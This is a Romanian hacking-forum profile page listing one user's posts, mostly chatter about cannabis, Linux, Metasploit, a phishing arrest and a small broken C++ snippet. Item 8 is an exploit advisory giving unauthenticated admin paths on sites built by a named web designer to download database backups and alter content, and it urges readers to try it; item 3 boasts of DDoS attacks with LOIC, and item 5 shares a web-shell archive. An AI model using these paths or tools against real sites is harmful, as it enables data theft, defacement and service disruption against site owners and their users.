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Everything posted by paxnWo

  1. intru ocazional ... pune in plm subiecte mai interesante
  2. zomg congratz !!! nu sunteti intregi
  3. paxnWo

    {#} Loic {#}

    e bunicel cu asta dadeam mai multi ddos la ro.... si sprut e bun
  4. depinde de fiecare ... trebuie sa fi chill cand fumezi , sa nu te gandesti la nimic . doar sa te simti bine
  5. RapidShare: Easy Filehosting download : ShellZ.rar - 139.0 Kb also see : http://rstcenter.com/forum/12684-rfi-tutorial.rst#post79874
  6. plm daca te prinde cu 1g de hasis sau maria, te bat cu bulanele si te baga la parnaie in plm pentru ce ? ca ai vrut sa fii in extaz 30 min ? plus ca nu provoaca decat dependenta psihica, depinde de fiecare persoana ... iar pentru cei dependenti , creste riscul de cancer. pai din bautura iti faci stomacul si ficatul prastie . din marijuana ce iti faci ? plus ca 1g e 600 de mii, nu o sa faci un joint in fiecare zi pentru un incepator din 0.3 max cade in cap .
  7. am mai adaugat exploit3 ... astia dau bani frumosi, cred, ca sa aiba un site ... dar care e buguit
  8. ##################### # Discovered by: paxnwo # Mail: paxnwo@yahoo.com # 26.oct.2008 ##################### (x)------------------------------------------------------------------------------------(x) ~| D0rk: design and developed by Parlic Design ~| Exploit1: /admin/backup/backup.php <!-- creates a backup of the db and provides you its name. eg : 26-10-2008 01-35.sql --> ~| Exploit2: /admin/backup/dump/db-backup-name.sql ~| Usage: www.site.com/admin/backup/dump/26-10-2008 01-35.sql ~| Exploit3: /admin/backup/list.php <!-- lists the avaible backups. you are now loged in as admin; you can change the content --> (x)------------------------------------------------------------------------------------(x) nu e mare lucru puteam sa postez la show-off toate site-urile create de Parlic Design si vai ce mare hacker sunt eu ca sa studiati contentul /admin/ , am gasit un site tot de la Parlic Design care nu e protejat: Index of /admin . pe langa faptul ca puteti sa puneti mana pe baza lor de date, pe unele merge sa si modificati contentul . jucati-va si o sa mearga .
  9. luati aici exemplu : darkc0de.com [ index ] aveti scannere scrise in python.
  10. mi-am picat singur forumul . merge
  11. What is it? The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler. What does it do? The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload. The Metasploit Framework - Downloads pentru cine stie sa il foloseasca
  12. Petitie Online - Petitie: "Petitie privind tolerarea consumului de Canabis"
  13. paxnWo

    Baby Linux =)

    Reader Christian Nielsen wrote from Sweden to tell us he and his girlfriend have named their baby Linux, after the operating system, and attached this darling photo. Nielsen says he and his girlfriend Veronica considered a few names during the pregnancy, "but when he finally arrived none of them seemed right. We both thought that he looked like a little Linux as soon as we saw him and decided to go for that name." You might wonder what the grandparents think of their choice, but Nielsen says it hasn't been a problem. "The reaction from family and friends has been positive -- they all like it. Our families think it sursa : linux.com
  14. " h4cky0u.org has been removed from The Defaced Server. The change goes effective on May 10th to allow for the change. The change started with a series of DDOS attacks on The Defaced's website and irc channel. This was in response to "skiddie" material on H4cky0u. On irc.pseud0.net (The Defaced's irc server) a mass invite to a petition for The Defaced to boot HY off of the server. Sean, The IRC Network Admin said he would have to entertain it. This led to yesterday's meeting in #meeting (creative these channel's are). After a vote by Defaced member's and Defaced leadership, it was decided to let HY go, but with no hard feelings. "
  15. e prea mare articolul asa ca l-am pus aici : pastebin - collaborative debugging tool
  16. Changes: *AJAX rendering techniques *Browser compliance! designed for Internet Explorer 6 & 7, Firefox, Opera, Seamonkey, Safari *The code is smaller, I made it too big of useless stuffs in 2.0 *The javascript does no more act on the page loading time if the source feed is offline or timeout, simply choose when it will load the remote feed by adding update_ModuleX(); anywhere on your page, preferably in the footer. *PHP proxy (this is optional, see post #2 in this thread) What is it: This is a simple javascript code wich you can copy and paste on your website to stay informed about the various public exploits. How to use it: The code below is the sample code for the remote exploits section in milw0rm, if you would like to display other sections like dos, local, webapps, just change the configuration settings in the header of the code and replace all occurences of milalerts1 to the milalerts# defined for each sections, you should know that they are defined like this on milw0rm.com: * remote exploits = milalerts1 * local exploits = milalerts2 * webapps exploits = milalerts3 * dos exploits = milalerts4 You must have only 10 occurences to change, with a quick editor that's fast to achieve. //update: I have forgot to mention, if you would like to display several milw0rm modules on a same web page, you must think to rename all occurences of _Module1 to _Module# where # is a unique number from 2 to 4 for example, this will work around some functions that could be mixed between each modules. mw.php - 12.0 Kb
  17. ai probleme multe (drivere) si daca merge, nu e la fel de bine ca pe un sistem apple (blocari, updateturile nu sunt compatibile toate) ... instaleaza virtual box si baga acolo os x . cauta pe google cum sa il instalezi .
  18. am trimis acum la ei un mail in care solicit si restul de suport pt curs ca nu il primisem atunci. cum l-am primit, il postez
  19. Directia pentru Combaterea Criminalitatii Informatice (DCCI) a arestat trei persoane in cazul spamului de la Raiffeisen Bank. Cei trei cetateni romani au apelat la 15 persoane pentru a deschide acelasi numar de conturi bancare separate, pentru a vira banii obtinuti prin procedeul de phishing, informeaza NewsIn. Surse din interiorul institutiei au afirmat ca s-au inregistrat peste 200 de plangeri de la clientii caora le-au disparut sume de bani din conturi. "Atacatorii au trimis nenumarate mesaje spam, iar spre surprinderea noastra au fost destui clienti care au raspuns solicitarilor. Am vrut sa vedem ce urmeaza, am urmarit banii si ne-am creat o imagine a ceea ce urmau sa faca. Nu putem specifica suma la care se ridica pierderile clentilor, deoarece investigatia este inca in desfasurare. Cele 15 persoane implicate in acesta actiune probabil ca vor primi pedepse in jurul a trei ani cu suspendare, iar celelalte trei urmeaza a fi judecate corespunzator", a declarat Virgil Spiridon, directorul adjunct al DCCI. In Romania, 80% dintre atacurile de spam si phishing se indreapta catre cetateni cu un nivel de educatie mai inalta si cu o conceptie mai dezvoltata a comertului electronic, atesta datele unui raport DCCI. Ponderea de tranzactii frauduloase este alcatuita din licitatii de produse fictive si achizitionari prin carti de credit compromise. _______________ sunt sigur ca nu o sa mai vedem pe forum cateva personaje off: cred ca rst ia ddos acum ca se misca fff prost
  20. sunt fan zeitgeist . l-am vazut in prima zi cand a aparut . am stat pe torrente si pe google cam 8 ore pana sa il gasesc in sfarsit . o sa fac o sectiune speciala pe site-ul meu dedicata conspiratiilor si fortelor oculte care ne conduc lumea catre noua ordine mondiala . pax = pace nwo = new world order Peace for the New Word Order . S a t a n i s t ( abia l-am luat . mentionez ca NU sunt satanist . )
  21. #include <iostream.h> float medie(float a, float b, float c) { float m; m=(a+b+c)/3; return m; } void main() { float a,b,c; cin>>a>>b>>c; cout<<media(a,b,c); }
  22. paxnWo


    nu e deloc dubios noi postam pe forumul liceului
  23. ti-am spus ca o pun la semnatura ... doar ca scrie codex =/
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